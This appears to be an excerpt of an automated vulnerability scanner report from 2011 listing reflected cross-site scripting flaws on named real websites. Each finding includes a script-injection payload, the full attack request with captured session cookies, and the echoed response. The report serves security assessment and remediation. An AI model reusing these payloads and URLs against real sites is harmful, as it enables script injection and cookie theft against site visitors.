GET /misc/canada/?d970c--><script>alert(1)</script>4f484edfe23=1 HTTP/1.1 Host: www.thelist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 14:52:33 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 14:53:33 GMT Connection: close Content-Type: text/html Content-Length: 56546
<HTML> <HEAD> <TITLE> Canadian Nationwide ISPs </TITLE>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script> <script language="javascript" src="http:/ ...[SNIP]... <!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1 url: /misc/canada/?d970c--><script>alert(1)</script>4f484edfe23=1 --> ...[SNIP]...
3.127. http://www.thelist.com/misc/usa/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.thelist.com
Path:
/misc/usa/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 54029--><script>alert(1)</script>63b507b24db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /misc/usa/?54029--><script>alert(1)</script>63b507b24db=1 HTTP/1.1 Host: www.thelist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 14:52:52 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 14:53:52 GMT Connection: close Content-Type: text/html Content-Length: 73083
<HTML> <HEAD> <TITLE> U.S. Nationwide ISPs </TITLE>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script> <script language="javascript" src="http://e1. ...[SNIP]... <!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1 url: /misc/usa/?54029--><script>alert(1)</script>63b507b24db=1 --> ...[SNIP]...
3.128. http://www.thelist.com/update.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.thelist.com
Path:
/update.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 2c2ad--><script>alert(1)</script>4971a9e3236 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /update.php?2c2ad--><script>alert(1)</script>4971a9e3236=1 HTTP/1.1 Host: www.thelist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 14:52:48 GMT Server: Apache Set-Cookie: PHPSESSID=1aef4ce19b0c7295ffe34788ae8d2b26; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 27599
<HTML> <HEAD> <TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE> <script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script> <link rel="stylesheet" href=" ...[SNIP]... <!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1 url: /update.php?2c2ad--><script>alert(1)</script>4971a9e3236=1 --> ...[SNIP]...
The value of the 86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6 request parameter is copied into an HTML comment. The payload 5a5d7--><script>alert(1)</script>74c957928d3 was submitted in the 86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=15a5d7--><script>alert(1)</script>74c957928d3 HTTP/1.1 Host: www.vbforums.com Proxy-Connection: keep-alive Referer: http://www.vbforums.com/welcomead/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bblastvisit=1298042195; bblastactivity=0; QUADIDX=107; intmintc__welcome; toURL=http%3A//www.vbforums.com/%3F86b8b--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E5c1edad1dc6%3D1; qsg=14508
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"> <head> <!- ...[SNIP]... <!-- sponsor-20: Missing QUAD ads for page_type: other on path www.vbforums.com with position E1 url: /?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=15a5d7--><script>alert(1)</script>74c957928d3 --> ...[SNIP]...
3.130. http://www.vbforums.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vbforums.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 86b8b--><script>alert(1)</script>5c1edad1dc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?86b8b--><script>alert(1)</script>5c1edad1dc6=1 HTTP/1.1 Host: www.vbforums.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"> <head> <!- ...[SNIP]... <!-- sponsor-20: Missing QUAD ads for page_type: other on path www.vbforums.com with position E1 url: /?86b8b--><script>alert(1)</script>5c1edad1dc6=1 --> ...[SNIP]...
The value of the ipid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be08d"><script>alert(1)</script>e28a8bea8e2 was submitted in the ipid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /whatisIntelliTXT.asp?ipid=${ipid}be08d"><script>alert(1)</script>e28a8bea8e2&cc=${cc}&server=${itxtserver} HTTP/1.1 Host: www.vibrantmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 92299 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQCDQBRBC=GHDMDPOCNOHIJBJAACFHCFBH; path=/ p3p: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" X-Powered-By: ASP.NET Date: Fri, 18 Feb 2011 14:45:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <titl ...[SNIP]... <input type="hidden" name="IPID" value="${ipid}be08d"><script>alert(1)</script>e28a8bea8e2"> ...[SNIP]...
3.132. http://www.virtacore.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.virtacore.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5a33</script><script>alert(1)</script>2f6c2775163 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?c5a33</script><script>alert(1)</script>2f6c2775163=1 HTTP/1.1 Host: www.virtacore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 18 Feb 2011 14:52:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=11144942;expires=Sun, 10-Feb-2041 14:52:41 GMT;path=/ Set-Cookie: CFTOKEN=96782673;expires=Sun, 10-Feb-2041 14:52:41 GMT;path=/ Content-Type: text/html; charset=UTF-8
3.133. http://www.wi-fihotspotlist.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wi-fihotspotlist.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4100a--><script>alert(1)</script>1dd4930cfbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?4100a--><script>alert(1)</script>1dd4930cfbd=1 HTTP/1.1 Host: www.wi-fihotspotlist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 14:57:28 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 14:58:28 GMT Connection: close Content-Type: text/html Content-Length: 59068
<html> <head> <title> Wi-FiHotSpotList.com, a directory of public hot spots for finding Wi-Fi wireless Internet access network nodes</title> <meta http-equiv="Content-Type" content="text/html; charset ...[SNIP]... <!-- house_ribbon: Missing QUAD ads for page_type: other on path www.wi-fihotspotlist.com with position U url: /?4100a--><script>alert(1)</script>1dd4930cfbd=1 --> ...[SNIP]...
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 26527<a>f1ef85c6ffb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /sections/asp.html HTTP/1.1 Host: www.internet.com Accept: */* Accept-Language: en User-Agent: 26527<a>f1ef85c6ffb Connection: close Cookie: WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026071106:ss=1298026071106; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f; OAX=rcHW801a81gABvEW;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload d27ea<a>18498db0b9f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /sections/win.html HTTP/1.1 Host: www.internet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d27ea<a>18498db0b9f Connection: close Cookie: WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026071106:ss=1298026071106; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f; OAX=rcHW801a81gABvEW;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML ...[SNIP]... <td class="debug" nowrap>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d27ea<a>18498db0b9f</td> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d242"><script>alert(1)</script>c13b4e9f625 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /2x/prequal.jsp HTTP/1.1 Host: www.liverpoolonlinedegrees.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=4d242"><script>alert(1)</script>c13b4e9f625
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP="ALL DSP COR CURa ADMa DEVa PSAa OUR BUS PHY ONL UNI COM NAV DEM STA PRE" Cache-Control: public Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 15:01:06 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: JSESSIONID=KxHn6svRMsE8juKRCV91xw**.app2-all1; Path=/ Set-Cookie: CLK=0#1298041266572; Expires=Sat, 16-Feb-2019 15:01:06 GMT; Path=/ Set-Cookie: CLK=0#1298041266572; Expires=Sat, 16-Feb-2019 15:01:06 GMT; Path=/ Content-Length: 33038
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 40f17<script>alert(1)</script>9d9bbfcf6ce was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /outsourcing-dot-net-development-contact-us.html HTTP/1.1 Host: www.outsourcingdotnetdevelopment.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=40f17<script>alert(1)</script>9d9bbfcf6ce Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56c7c"><script>alert(1)</script>214ec983f81 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /outsourcing-dot-net-development-contact-us.html HTTP/1.1 Host: www.outsourcingdotnetdevelopment.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=56c7c"><script>alert(1)</script>214ec983f81 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d762"><script>alert(1)</script>580c35d613d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /xss-cross-site-scripting.html HTTP/1.1 Host: www.outsourcingdotnetdevelopment.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=1d762"><script>alert(1)</script>580c35d613d
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 14:58:15 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=hvqru3oc84p0t9uhs35uhe1f47; path=/ Connection: close Content-Type: text/html Content-Length: 18687
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="keywords" content="xss (cro ...[SNIP]... <a href="http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html" title="1d762"><script>alert(1)</script>580c35d613d"> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload b5b73<script>alert(1)</script>09d8451dc31 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /xss-cross-site-scripting.html HTTP/1.1 Host: www.outsourcingdotnetdevelopment.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=b5b73<script>alert(1)</script>09d8451dc31
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 14:58:16 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=lvcmsh7stqdse1kgcaeika84r2; path=/ Connection: close Content-Type: text/html Content-Length: 19009
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="keywords" content="xss (cro ...[SNIP]... </script>09d8451dc31">b5b73<script>alert(1)</script>09d8451dc31</a> ...[SNIP]...
The value of the vsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70132"-alert(1)-"47d14743a97 was submitted in the vsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/virtacore/safe-monitor.js?ps_h=581W&ps_t=1297999466909 HTTP/1.1 Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.powervps.com/cpanel-plesk-vps.aspx Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vsid=EnEadSGx2lPF70132"-alert(1)-"47d14743a97
Response
HTTP/1.1 200 OK Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml" Content-Type: application/x-javascript Cache-Control: must-revalidate, max-age=0 Pragma: no-cache Content-Length: 2869 Date: Fri, 18 Feb 2011 03:24:02 GMT Connection: close
var ps581Wsid = "EnEadSGx2lPF70132"-alert(1)-"47d14743a97"; // safe-monitor@gecko.js
3.142. http://www.internet.com/ebook [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.internet.com
Path:
/ebook
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b998f</script><script>alert(1)</script>ad4b92d09c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ebook?b998f</script><script>alert(1)</script>ad4b92d09c2=1 HTTP/1.1 Host: www.internet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026071106:ss=1298026071106; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f; OAX=rcHW801a81gABvEW;
3.143. http://www.internet.com/ebook [name of an arbitrarily supplied request parameter]previous
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.internet.com
Path:
/ebook
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60338"><script>alert(1)</script>86ce1a3ea2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ebook?60338"><script>alert(1)</script>86ce1a3ea2b=1 HTTP/1.1 Host: www.internet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026071106:ss=1298026071106; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f; OAX=rcHW801a81gABvEW;